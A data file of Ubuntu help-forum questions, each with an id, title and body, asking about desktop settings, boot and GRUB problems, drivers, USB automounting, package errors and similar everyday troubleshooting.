325250	any setup to version control all ubuntu settings ?	just now , i had to google for the third time in my life on how to disable that thing in ubuntu , where you hold the super key and a help window pops up . granted , there was a few months in between , but i should n't have to remember these things anyway . and even if i had perfect memory , i still do n't want to launch ccsm navigate to ubuntu unity plugin search where in these 4 tabs is the option that i want to disable that i 've disabled times before , and there 's no conceivable scenario where i 'd want to use it . note here that i have nothing against this setting being enabled by default : maybe it 's actually helpful to a lot of new people . i just want to have an option to disable it once and for all for all my systems . my plan is to version control all these settings , and each time i make a change in the gui , i 'll make a patch that does it automatically next time . the question is where are these settings ? i think they 're stored in xml somewhere . here 's the current state of my patch : gsettings set org.gnome.desktop.wm.preferences button-layout ' : minimize , maximize , close' gsettings set org.gnome.desktop.wm.preferences theme 'new wave' i do n't know if i can set all the settings with just gsettings , maybe there are more tools that do this .
325254	why are zombie processes being created upon boot ?	ubuntu 13.04 . recently zombies have started appearing . my processes are : process cpu information chrome 65 % surf the web calculator 10 % calculate operations < zombieunknown > 0 % < unknown > < deadprocess > 0 % < defunct > so how are they coming up ? this was recorded on boot , when just chrome and calculator were running . thanks in advance .
325258	pls explain the media architecture of ubuntu touch	can anyone explain the media architecture provided in the following link ? https : //wiki.ubuntu.com/touch/mediaarchitecture i want the description of the diagram shown below :
325260	ubuntu for smartphones	is there any way i can install ubuntu on my smartphone . my phone is samsung wave 3 gt-s8600 it is bada 2.0 os it 's firmware is s8600ddld1/s8600oddld1 ( inu )
325262	what is a `` failed to load module `` module-ladspa-sink '' '' error ?	when i put in the terminal pulseaudio appears : e : [ pulseaudio ] module-ladspa-sink.c : master sink not found e : [ pulseaudio ] module.c : failed to load module `` module-ladspa-sink '' ( argument : `` sink_name=ladspa_output.mbeq_1197.mbeq master=alsa_output.pci-0000_00_1b.0.hdmi-stereo plugin=mbeq_1197 label=mbeq control=3.0,3.0,7.3,7.0,3.0 , -1.0 , -6.6 , -6.3 , -4.5 , -4.0,1.1,1.2,5.8,7.9,8.8 '' ) : initialization failed . e : [ pulseaudio ] main.c : module load failed . e : [ pulseaudio ] main.c : failure to start the daemon . how i can fix it ?
325266	no menu and title bar after fixing low graphics mode in ubuntu 13.04	i had a problem with low graphics mode but i fixed it and i saw that the gui has come . but when i logged on i saw that the left side menu bar and upper side bar which have close minimize and other system buttons is not there . can you tell me how to fix this ?
325269	brasero stuck at 'normalizing tracks '	i am trying to burn an audio cd using brasero . with all albums i 've tried to burn , brasero gets stuck at normalizing tracks :
325272	permanent xmodmap in ubuntu 13.04	i can not make xmodmap run on login in ubuntu 13.04 . i have searched around , including in askubuntu and all answers i found do not work . i have a file named .xmodmap in my home folder which contains the desired mappings . if i run it manually it works fine , so there is no error there . in order to make it run on startup , i have tried : using various .xinitrc containing one of the following commands : xmodmap .xmodmap xmodmap ~/.xmodmap /usr/bin/xmodmap /home/name/.xmodmap if [ -s ~/.xmodmap ] ; then xmodmap ~/.xmodmap fi using .xresources instead of .xinitrc with the same variations . setting it as a startup application . none of the above works in ubuntu 13.04 ( 64-bit ) . i also saw a few ideas about globally changing the keyboard mappings , but most of them were not applicable in ubuntu 13.04 ( i.e . the corresponding files did not exist where specified ) and i prefer not to touch the global settings anyway .
325273	how to find java path and make a shortcut with jar files ?	i 'm very new to ubuntu , installed 12.04 for the first time a few days ago . so i basiclly got a game ( feedthebeast , mod for minecraft ) . now the jar file which i downloaded works just fine , but i find it clunky to go find it everytime i want to play , so i want a shortcut . someone on youtube made this as a .sh file which i can then later make a .desktop in my applications to make the shortcut , pretty complicated tbh but the path in this file is obv his path . bindir= '' $ ( dirname `` $ ( readlink -fn `` $ 0 '' ) '' ) '' cd `` $ bindir '' export ld_library_path= '' /usr/lib/jvm/java-7-ora足cle/jre/lib/amd64 '' java -xms1g -xmx4g -jar ~/.ftblauncher/ftb_launcher.jar but how do i find my java path , the correct one for this to work . i tried multiple ways , but for some reason i do n't got the folders , where people are suposed to have java - when i run whereis java this is what i get : /usr/bin/java /usr/bin/x11/java/ /usr/share/java/ /usr/share/man/man1/java1.gz neither looks like the one he used above . i installed java following this video : http : //www.youtube.com/watch ? annotation_id=annotation_494531 & feature=iv & src_vid=i_ndc01lmb4 & v=ikzuzo21vdk essentially i jsut want a shortcut for my .jar file so i can easily access my game on the unity dock if you guys can help me , or come up with an easier way to make this shortcut for my .jar file i would be so happy !
325274	why do i get ibus-warning on running the sudo gedit command ?	whenever i try to run a sudo gedit command as instructed in step 4 of this answer , my terminal puts out : ( gedit:7549 ) : ibus-warning ** : the owner of /home/jared/.config/ibus/bus is not root ! how do i get out of this situation ?
325276	ubuntu is very unstable on my pc	i have ubuntu 12.04 lts which is very unstable on my pc . when i shut down my pc it asks for a confirmation but it does n't respond when i click on shut down . i finally have to press the reset button . i have installed all available updates but when i play a dvd or 3gp , mp4 videos from a movie player it asks to install missing plugins . however , when i click on the install button , it shows an error message that it could not be installed . then , i tried to install gstreamer from terminal and it asked for a password but when i tried to type the password it was n't shown on the screen . please help .
325283	how do i check the health of a ssd ?	we all know that ssds have a limited predetermined life span . so the question for me is how do i check in ( ubuntu ) linux what the current health status of my ssd is ? and maybe an estimation how long it will take ? graphical tool is preferred , but command line tool would also be fine . i 'm using xubuntu 12.04 lts
325286	intened to move to ubuntu	does ubuntu run without problems on an intel b980 2.4 sandybridge proccessor in 64 bit mode on a laptop which has been configured for windows 8 ? my concerns are from different forums which describe their computers hang or crash
325287	my linux book has many references to xinetd but i ca n't find it ?	ca n't see it anywhere , is it called something different ?
325290	pyhon ( v2.7 ) requires to install plugins	i installed ubuntu very first time over window 7 , but when i played a mp3 song it shows a `` python ( v2.7 ) requires to install plug in to play media files '' message . what to do ? help me ! i have searched over the internet but found nothing there ...
325291	how can i install ubuntu on a pc preinstalled with windows 8 on samsung np370r5e-s04in	i recently bought samsung laptop and i 'm facing hard time to boot my pen driver so that i can use ubuntu 12.04 . i only have one partition so i want to use it from a pen drive ... this pen drive works fine on other laptops and those who are having win 8 but not on samsung laptop that is mine.lol.. plz help me out..
325293	using sdl in eclipse	i have downloaded a c++ program . so i decided to run it but it says no such files or directories for sdl.h and sdl_ttf.h files . i installed the libsdl2 package from terminal as well as downloaded it separately . but the problem persists . can anyone tell me what i am doing wrong and help me with the solution . thanks in advance for any help .
325300	automount different flash drives with same name	i would like to auto-mount a flash drive i have called `` flash '' . infact i have 2 drives with the same name . both fat . i would like ideally which ever one is connected when the system boots to be mounted . is this possible ? or does auto mount work on an identifier beyond the name ?
325303	drivers for gaming nvidia and wine and what happened to wine tricks ?	witch nvidia driver should i be using for gaming under wine ? i ask this question after installing one of my favourite games , sins of a solar empire , in wine . the game seems to run fine , its not to graphic intensive and my gpu is good and quick , but the problem i found was i could not change the resolution and it only listed random refresh rates like 42hz and 57hz and then after a restart i could not start the game with out unity been displayed as well so i figure it could be drivers . is there a preferred driver ( im using 310 tested ) also is the driver from the nvidia site better ? and finally where did wine tricks go ? i cant find it in the repo any more .
325304	usb devices do not appear in desktop or launcher ( not automounted )	after a recent upgrade , the usb devices are not appearing in desktop or launcher . when plugged in , devices power up . lsusb shows this output , < truncated > bus 001 device 005 : id 174c:5106 asmedia technology inc . transcend storejet 25m3 bus 002 device 006 : id 0411:0098 buffalo inc. ( formerly melco. , inc. ) last two are the devices i have plugged in . the devices are not found in ls /media/ i have tried the solution using myunity as indicated in http : //askubuntu.com/a/101415/82650 . turned on show devices , no luck . i have also tried executing gsettings set org.gnome.nautilus.desktop volumes-visible true as elaborated in how do i get a usb drive shortcut on desktop ? . again no luck , the devices do not appear in desktop . [ edit ] looked in to https : //help.ubuntu.com/community/mount/usb . checked my machine in dconf-editor . the org.gnome.desktop.media-handling key for automount has been properly set . [ edit ] the devices are recognized both in gparted and disk utility . all the device information shown are completely correct . the devices are present as /dev/sdd1 and /dev/sde1 . but amazingly both gparted and disk utility are showing that the devices are not mounted . [ edit ] if i manually mount the devices using the command sudo mount device ( /dev/sdd1 or /dev/sde1 < to some dir > this works fine . i can access the devices from all applications . so , the problem boils down to , the devices are not being auto mounted . i am using ubuntu 12.04 ( home machine ) . this is where the problem occurs . the devices work fine ( automount ) in my office machine , ubuntu 13.04 . [ edit 2 ] : after installation of autofs and automount and a reboot of the machine , the devices are being automounted again . still , i would like to know , why do i have to install these ? how did they get uninstalled ? how did the devices work fine so far ?
325307	chromium is corrupted after creating a desktop shortcut	i wanted to create the shortcut to a website on my desktop , so i dragged a bookmark from the bookmark bar of chromium to the desktop . a file called < name > in the desktop containing the following text has been created : [ desktop entry ] encoding=utf-8 name= < name > type=link url= < url > icon=text-html i tried to double click on that file , and the page opened up correctly . after trying a few time i started getting a message about some wrong settings . after a few times the message stopped appearing , and i ca n't remember what was the exact content of the message . for a few minutes the error message would show up even when i was opening chromium , without using that shortcut . now chromium is not able to sign in to my gmail account and sync . if i try to set the password again , the settings page becomes gray and hangs . what is broken in my chromium ? edit : after closing and reopening chromium ( without using that shortcut ) the message came up again . this is its content : your profile could not be opened correctly . some features may be unavailable . please check that the profile exists and you have permission to read and write its contents . after starting chromium i had 6 popups with this message showing up at the same time . edit 2 : chromium version 28.0.1500.71 ubuntu 13.04 ( 28.0.1500.71-0ubuntu1.13.04.1 )
325308	start application in the background on gnome	is there a way to avoid bringing an application to the front when opening it ? i 'm launching an app several times trough a terminal window ( running a custom c++ program ) and it keeps popping up when opening .
325310	dual monitor resolution changing after reboot with amd ccc	i have 2 monitors connected to my machine which is running ubuntu 13.04 x64 , one of which has a resolution of 1680x1050 and the other is 1280x1024 . i have a amd a10 5800k processor which includes radeon hd 7660d integrated graphics . i have installed the fglrx and fglrx-updates drivers and both of them are giving me the same problem : when i reboot my machine , the resolution of both monitors are set to 1280x1024 . i then go in to amd ccc in administrative mode and set the main monitor back to 1680x1050 which works fine until i reboot the machine . is there anyway to make this configuration persistent across reboots ?
325322	rosetta stone installation	i am trying to install a rosettastone language and not having much luck . ny help out there would be appreciated . thanks in advance . meryl
325324	how download bulk images from a photo gallery like website ?	is there anything like neodownloader for ubuntu to download all the images from a link ... .or can it possible to download directory from webserver containing photos ?
325328	grub is removed when uninstalling/installing operating systems	i have two partitions with ubuntu installed on each of them . i removed one of the partitions with g-parted live , and when i reboot , i expected grub still to display with the other partition with ubuntu on it to boot from . however , instead i get an error , i ca n't remember what it said but it would n't let me boot . i had to create another partition and install ubuntu again , just to get grub back , which was a pain . a few days later i create another partition and install windows 7 on it , and during boot , grub was gone again , it would only boot from windows , even though i had ubuntu installed on another partition . so , once again , i had to create a new partition and install ubuntu just to get grub back . is there any way to keep grub when creating and removing partitions ?
325338	sd card vanished after placement of .nomedia file	this is not really a ubuntu problem but since i moved from windows to ubuntu i naturally would like to use ubuntu to solve this problem . i bought a 32gb sandisk micro sd card for my galaxy note 2 . everyrhing worked fine and i started adding files to it . after a couple of files ( music , pictures abd docs ) were added i realized that many of them appeared in the gallery . this became annoying because i did not want all of them to appear there . i usually use a .nomedia file placed in the folder i want to exclude to manage the media flood in the gallery . since i put a whole lot of media onto the new sd card i thought it wont hurt if i place the .nomedia file directly in the root of the sd card . and so i did . seconds later the sd card vanished from android altogether . plugged it into the card reader on my windows laptop . a removable disk appears in the file tree but when i clicked on it it only told me to please add some media into drive . ubuntu it doesnt even show at all . if i plug in anothervsd card it pops up fine . so i tried finding it . i plugged it back the card reader on my machine running ubuntu and typed sudo fdisk -l. it listed it once as dev/sdb i tried mounting it into media/sdcard but for whatever reason my laptop hung itself shortly afterwards . now when i type fdisk -l the disk does n't even appear anymore . please someone help me out here . do n't care about the data on the card but would like to use the card again . so i 'm trying to find acway how to format it and make it usable again using ubuntu
325341	no updates found in 13.04	i ca n't check for updates in ubuntu 13.04 . i am getting a revert button in the software & upgrade window . what does it mean ?
325342	when i select ubunu my computer just restarts	i installed ubuntu on windows 8 yesterday , but when i select ubuntu on the os selection screen the computer just restarts .
325343	unable to delete file - rm : can not remove input/output error	some file is in my ntfs file system which i ca n't delete . it 's giving this error : rm : can not remove `zigbqc04 ' : input/output error any other files also could not be copied in that folder and showing error message as : error opening file 'file-path ' : input/output error any solution .
325344	wireless interruptions on router cause by home laptop sever	ubuntu home server on laptop/wireless , when accessing the the database from another wireless laptop or desktop such as www.example.com/phpmyadmin , it causes wireless internet to be delay and broken frequently . i have had updated and upgraded this os to the latest version and it 's still does n't help . on a desktop it seems to be fine . i 'm thinking of switching from wireless to wire , how do you do it on the ubuntu ?
325346	nvidia and ati on 13.04 step by step	im have dual xeon system for photogrammetric related stuff and need setup ubuntu 13.04 with nvidia 560ti and amd 7970 3gb card on 2 monitors . and use both cards with opencl drivers . its possible to instal the official amd drivers ( just one card in system ) or just nvidia , but not both of them . get mostly the card is not configured ( nvidia ) or something this way ( standard issue with them ) is there a way to run it eventually with just one monitor ? ( but both card running opencl ) in the application that i use .
325350	errors in installation after upgrading from 11.10 to 12.04	i 've recently upgraded my ubuntu 11.10 to 12.04 . whenever i 'm trying to install some new package using apt-get i 'm getting the following error messages in terminal : $ apt-get -y update & & apt-get -y upgrade & & apt-get -y dist-upgrade & & reboot and this is what i got : hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release hit http : //security.ubuntu.com precise-security release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //ppa.launchpad.net precise/main sources hit http : //security.ubuntu.com precise-security release hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net precise/main i386 packages hit http : //in.archive.ubuntu.com precise release.gpg ign http : //ppa.launchpad.net precise/main translationindex hit http : //security.ubuntu.com precise-security/main sources hit http : //extras.ubuntu.com precise release hit http : //archive.canonical.com precise/partner i386 packages get:1 http : //in.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //security.ubuntu.com precise-security/restricted sources hit http : //extras.ubuntu.com precise/main sources get:2 http : //in.archive.ubuntu.com precise-backports release.gpg [ 198 b ] ign http : //archive.canonical.com precise/partner translationindex hit http : //security.ubuntu.com precise-security/universe sources hit http : //extras.ubuntu.com precise/main i386 packages hit http : //in.archive.ubuntu.com precise release hit http : //security.ubuntu.com precise-security/multiverse sources ign http : //extras.ubuntu.com precise/main translationindex get:3 http : //in.archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages ign http : //ppa.launchpad.net precise/main translation-en_us hit http : //security.ubuntu.com precise-security/universe i386 packages ign http : //ppa.launchpad.net precise/main translation-en get:4 http : //in.archive.ubuntu.com precise-backports release [ 49.6 kb ] hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //in.archive.ubuntu.com precise/main sources hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //in.archive.ubuntu.com precise/restricted sources hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //in.archive.ubuntu.com precise/universe sources hit http : //security.ubuntu.com precise-security/universe translationindex ign http : //archive.canonical.com precise/partner translation-en_us hit http : //in.archive.ubuntu.com precise/multiverse sources hit http : //security.ubuntu.com precise-security/main translation-en ign http : //archive.canonical.com precise/partner translation-en ign http : //extras.ubuntu.com precise/main translation-en_us hit http : //in.archive.ubuntu.com precise/main i386 packages hit http : //security.ubuntu.com precise-security/multiverse translation-en ign http : //extras.ubuntu.com precise/main translation-en hit http : //in.archive.ubuntu.com precise/restricted i386 packages hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //in.archive.ubuntu.com precise/universe i386 packages hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //in.archive.ubuntu.com precise/multiverse i386 packages hit http : //in.archive.ubuntu.com precise/main translationindex hit http : //in.archive.ubuntu.com precise/multiverse translationindex hit http : //in.archive.ubuntu.com precise/restricted translationindex hit http : //in.archive.ubuntu.com precise/universe translationindex get:5 http : //in.archive.ubuntu.com precise-updates/main sources [ 410 kb ] get:6 http : //in.archive.ubuntu.com precise-updates/restricted sources [ 5,467 b ] get:7 http : //in.archive.ubuntu.com precise-updates/universe sources [ 93.5 kb ] get:8 http : //in.archive.ubuntu.com precise-updates/multiverse sources [ 6,582 b ] get:9 http : //in.archive.ubuntu.com precise-updates/main i386 packages [ 683 kb ] get:10 http : //in.archive.ubuntu.com precise-updates/restricted i386 packages [ 10.0 kb ] get:11 http : //in.archive.ubuntu.com precise-updates/universe i386 packages [ 214 kb ] get:12 http : //in.archive.ubuntu.com precise-updates/multiverse i386 packages [ 13.8 kb ] hit http : //in.archive.ubuntu.com precise-updates/main translationindex hit http : //in.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //in.archive.ubuntu.com precise-updates/restricted translationindex hit http : //in.archive.ubuntu.com precise-updates/universe translationindex get:13 http : //in.archive.ubuntu.com precise-backports/main sources [ 2,935 b ] get:14 http : //in.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:15 http : //in.archive.ubuntu.com precise-backports/universe sources [ 34.9 kb ] get:16 http : //in.archive.ubuntu.com precise-backports/multiverse sources [ 5,311 b ] get:17 http : //in.archive.ubuntu.com precise-backports/main i386 packages [ 2,390 b ] get:18 http : //in.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:19 http : //in.archive.ubuntu.com precise-backports/universe i386 packages [ 35.9 kb ] get:20 http : //in.archive.ubuntu.com precise-backports/multiverse i386 packages [ 5,178 b ] hit http : //in.archive.ubuntu.com precise-backports/main translationindex hit http : //in.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //in.archive.ubuntu.com precise-backports/restricted translationindex hit http : //in.archive.ubuntu.com precise-backports/universe translationindex hit http : //in.archive.ubuntu.com precise/main translation-en hit http : //in.archive.ubuntu.com precise/multiverse translation-en hit http : //in.archive.ubuntu.com precise/restricted translation-en hit http : //in.archive.ubuntu.com precise/universe translation-en hit http : //in.archive.ubuntu.com precise-updates/main translation-en hit http : //in.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //in.archive.ubuntu.com precise-updates/restricted translation-en hit http : //in.archive.ubuntu.com precise-updates/universe translation-en hit http : //in.archive.ubuntu.com precise-backports/main translation-en hit http : //in.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //in.archive.ubuntu.com precise-backports/restricted translation-en hit http : //in.archive.ubuntu.com precise-backports/universe translation-en fetched 1,623 kb in 21s ( 77.2 kb/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-3.0.0-29-generic linux-image-3.0.0-30-generic linux-image-3.0.0-31-generic 0 upgraded , 0 newly installed , 3 to remove and 0 not upgraded . 13 not fully installed or removed . after this operation , 350 mb disk space will be freed . ( reading database ... 265234 files and directories currently installed . ) removing linux-image-3.0.0-29-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.0.0-29-generic /boot/vmlinuz-3.0.0-29-generic update-initramfs : deleting /boot/initrd.img-3.0.0-29-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.0.0-29-generic /boot/vmlinuz-3.0.0-29-generic /usr/sbin/grub-mkconfig : 27 : /etc/default/grub : want : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.0.0-29-generic.postrm line 328. dpkg : error processing linux-image-3.0.0-29-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.0.0-30-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.0.0-30-generic /boot/vmlinuz-3.0.0-30-generic update-initramfs : deleting /boot/initrd.img-3.0.0-30-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.0.0-30-generic /boot/vmlinuz-3.0.0-30-generic /usr/sbin/grub-mkconfig : 27 : /etc/default/grub : want : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.0.0-30-generic.postrm line 328. dpkg : error processing linux-image-3.0.0-30-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.0.0-31-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.0.0-31-generic /boot/vmlinuz-3.0.0-31-generic update-initramfs : deleting /boot/initrd.img-3.0.0-31-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.0.0-31-generic /boot/vmlinuz-3.0.0-31-generic /usr/sbin/grub-mkconfig : 27 : /etc/default/grub : want : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.0.0-31-generic.postrm line 328. dpkg : error processing linux-image-3.0.0-31-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.0.0-29-generic linux-image-3.0.0-30-generic linux-image-3.0.0-31-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please someone help me solve this problem .
325353	having a wifi usb wich does not have a driver on linux systems ?	i have a wifi usb sagem xg-76na 802.11bg . i want to run it on ubuntu that i did n't install yet , and i want to know if the driver will be installed automatically because the only way i can connect to the internet is the usb .
325358	uninstall ubuntu laptop	i had ubuntu as a dual boot on my laptop . i wanted to install a fresh copy of ubuntu and delete the partition on windows and reclaimed it as a new storage location . i then downloaded the windows installer for ubuntu 12.04 lts . i noticed that before i installed ubuntu 12.04lts when i turn on my laptop it still gives me the option to boot into ubuntu ( despite me deleting the partition and reclaiming the memory ) . i have been trying to boot straight into windows but to no avail . anyway , i have tried installing ubuntu 12.04lts with the windows installer 3 times and all 3 times my machine would just freeze at the ubuntu log in . when i force shut down and restart it says that grub can not be found . can someone please help ... .
325361	screen resolution problems on samsung monitor	i have a monitor samsung 19 ' which resolution is 1440x900 ( 16:10 aspect ratio ) . when i set it in the recently installed ubuntu 13.04 , the bottom of the screen gets cut out trying to change to another resolution in which i would be able to view all the screen , i found that 1280x960 ( 4:3 ) worked . the screen looks stretched and low resolution , though . how do i fix it ? consider in your answer that i 'm a noob .
325362	how to fix dhcp and tftp server ?	i do a job in which i need tftp and dhcp server . the dhcp settings i should adjust is ( i have dhcp and dhcp 3 , not sure where to set ) : default-lease-time 21600 ; max-lease-time 43200 ; option domain-name-servers 10.0.0.1 ; option netbios-name-servers 10.0.0.1 ; option netbios-node-type 8 ; option www-server 10.0.0.1 ; authoritative ; allow booting ; allow bootp ; subnet 10.0.0.0 netmask 255.255.255.0 { option routers 10.0.0.1 ; option subnet-mask 255.255.255.0 ; option broadcast-address 10.0.0.255 ; filename `` /tftpboot/newsistemgeminis '' ; range 10.0.0.10 10.0.0.100 ; } i have to copy ''newsistemgeminis '' kernel image to the /tftpboot/ . for the tftp server should edit /etc/inetd.conf and set the server directory to /tftpboot/ but this file is empty : / i installed the following packages : dhcpd , tftp , tftpd-hpa , isc-dhcp-server now , start tftp and dhcp , but i have these problems : root @ ubuntu : /home/ubuntu # invoke-rc.d dhcp start invoke-rc.d : unknown initscript , /etc/init.d/dhcp not found . i do not understand what happens , for more i seek not solve the problem , could someone please help me ? i 'll be very grateful , thanks and greetings .
325363	wireshark troubles	i 'm only able to watch my own data through a network and nothing else . i have no clue what to do anymore after trying a lot of different things . im running ubuntu 13.04 on vmware .
325364	grub failed to install during boot-repair	i get ^ that error after doing the steps told by boot-repair ( after installing ubuntu , i never got the option to boot it - it only let me `` try ubuntu '' or `` install ubuntu '' ) . what does this mean ?
325365	oafiid : gnome_fastuserswitchapplet error	i recently lost my gnome desktop manager after uninstalling pulseaudio ( see : gnome/gdm not starting ) . after getting the desktop environment back up , i was presented with the following error message : the panel encountered a problem while loading `` oafiid : gnome_fastuserswitchapplet '' do you want to delete the applet from your configuration ? [ do n't delete ] [ delete ] the only difference i can see in the desktop is the absence of the `` shut down '' applet in the gnome panel ( 2.30.2 ) . patrick @ dell-desktop : ~ $ sudo apt-get install gnome-applets [ sudo ] password for patrick : reading package lists ... done building dependency tree reading state information ... done gnome-applets is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . patrick @ dell-desktop : ~ $ after restart the error still remains . i have also tried : 'sudo aptitude install gnome-applets' patrick @ dell-desktop : ~ $ sudo aptitude install gnome-applets [ sudo ] password for patrick : reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0b of archives . after unpacking 0b will be used . writing extended state information ... done reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done patrick @ dell-desktop : ~ $ then 'sudo aptitude install fast-user-switch-applet' patrick @ dell-desktop : ~ $ sudo aptitude install fast-user-switch-applet reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done no candidate version found for fast-user-switch-applet no candidate version found for fast-user-switch-applet no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0b of archives . after unpacking 0b will be used . writing extended state information ... done reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done patrick @ dell-desktop : ~ $ after restart the error still remains . in both of the above attempts i see ... gnome-applets is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . searching multiple forums all point to the same to fixes above . unfortunately i don ; t seem to have the same luck . my questions are : is there a fix ? if not ( i see it is a bug reported here : https : //bugs.launchpad.net/ubuntu/+source/gnome-panel/+bug/878241 ) , should i delete the applet ? i am running : gnome 2.30.2 ubuntu 10.04 lts dell latitude 13 thanks ...
325368	how to remove an alias ?	i want to remove gs alias from my pc . when type gs it will open the ghost script . but i checked everywhere in the home directory .alias .bash_aliases .bashrc i also overwrite the gs with my custom alias . i ca n't remove it . and i also type alias in terminal , in the list i could't find it please i want to remove it ...
325369	where is gparted located in usb installation file ?	i want to install ubuntu on my laptop that already has windows 7 home premium . i have the .iso image of ubuntu 12.04.1 which i have burned to usb . i have successfully booted using usb drive . i have gone through some tutorials which tells how to install ubuntu to new partition . some of these websites recommend using gparted to shrink partition etc . however , i could not find any icon to gparted on the desktop . i tried `` system setting '' link but there also i could not find it . could anyone help me understand where is gparted located and how do i run it ? please note that i do not have prior experience in linux/ubuntu .
325370	authentication password required to download ubuntu application	i m using a wifi connection but when i m trying to download ubuntu app from app store it is asking for some authentication password , i m also unable play downloaded video it asks for plugin
325373	extracting install iso to a partion	i currently have ubuntu 12.04 installed and i am ready to upgrade . i would like to do a `` clean install '' for various reasons . when i installed 12.04 i had extracted the iso to a 1gb `` installer '' partion on my hard disk and i would like to do the same thing now , but i can no longer find instructions on how to do this . i thought i could use the usb creator tools ( either usb-creator-gtk or unetbootin ) but it seems neither of these will write the install files to a local partion . i honestly ca n't remember but i may have used dd to write the image to the partition but given the low-level nature of what 's going on i 'd like to ask before typing these things in the terminal . i believe i can do it as follows dd bs=4096 if=/home/user/downloads/ubuntu-13.04-desktop-amd64.iso of=/dev/sda6 conv=notrunc , noerror i have verified that sda6 is in fact the partition i wish to extract to by looking at the drive labels in gparted . i like having the installer iso on a partition that grub can find so that when i run into problems i always have a `` spare '' system on hand that i can boot into and mess around with config files . however i hate having to burn isos to dvd or dig through my ten cheapo usb sticks to find the one that actually works with a bootloader on it . i also like the fact that update-grub can find that partition and add it to the boot menu , so that if i do something to make my main system unbootable i just down-arrow to the installer menu item from grub and have a nice desktop from which i can fix things , or , in the worst case , just start over with a clean install ( /home is a separate partition , so i dont really lose anything this way ) . so my question , is basically just : is this the right command ?
325375	google voice notifications ubuntu 13.04	i 've tried here : http : //www.omgubuntu.co.uk/2010/06/add-google-voice-alerts-to-the-ubuntu-messaging-menu i 've also tried : https : //launchpad.net/gvoice-notifier and i 've tried to install growl for linux ( which claims to be updated for 13.04 raring . each fails either because it 's not updated , or some other unknown reason . there are several other things that i 've tried , i ca n't possibly list them all . i know about browser extensions that are able to do this ( as long as you have the browser up and running ) ... but i want a standalone application that runs at all times . i want to get google voice notifications on ubuntu 13.04 's desktop . note : voice and video chat for gtalk is different than google voice . google voice is an actual phone number which can be used to make/receive calls and texts message physical phones - not just contacts who are signed onto google .
325376	ca n't use windows after installing ubuntu	i have windows on my machine and then i installed ubuntu 12.04 using a cd . i could n't select ubuntu on startup , so i ran the boot-repair . now i do n't get the option to use windows . any help here , please ? ?
325378	s.m.a.r.t settings lost after waking up	i have 24 gb ssd disk ( /dev/sdb ) which has ubuntu on it , and 750 gb hdd ( /dev/sda ) which has my data on it . i rarely access my data disk ( /dev/sda ) , so i want it to sleep untill the time i want to use it . to do that , i have set the following options in disks app , drive settings section . standby timeout : 1 min apm ( advanced power management ) : 127 ( spin-down permitted ) everything works in the way that i expected but when the computer goes into the sleep and then wakes up , all the settings that i have somehow does n't work . in order to have it worked again , i must do a little change in disk settings and save the settings again .
325391	neither pidgin or empathy receive offline gmail chat messages	i ca n't recive any offline message from gmail chat . i need to get them . i set up pidgin and empathy whith my gmail account , but they only receive messages when i am online . what do i do ?
325394	desktop comupter with ubuntu built in	are their any major manufacturers in the usa who have desktop ( not laptop or notebook ) but old fashioned desktop computers that come built with ubuntu as it 's operating system right out of the box instead of windows ? i do n't want to repartition or do anything with a windows system , i just want to change to something that has ubuntu as it 's native operating system built in and i want it to be a desktop with room to add memory , expansion bays , card readers ... etc ... ..
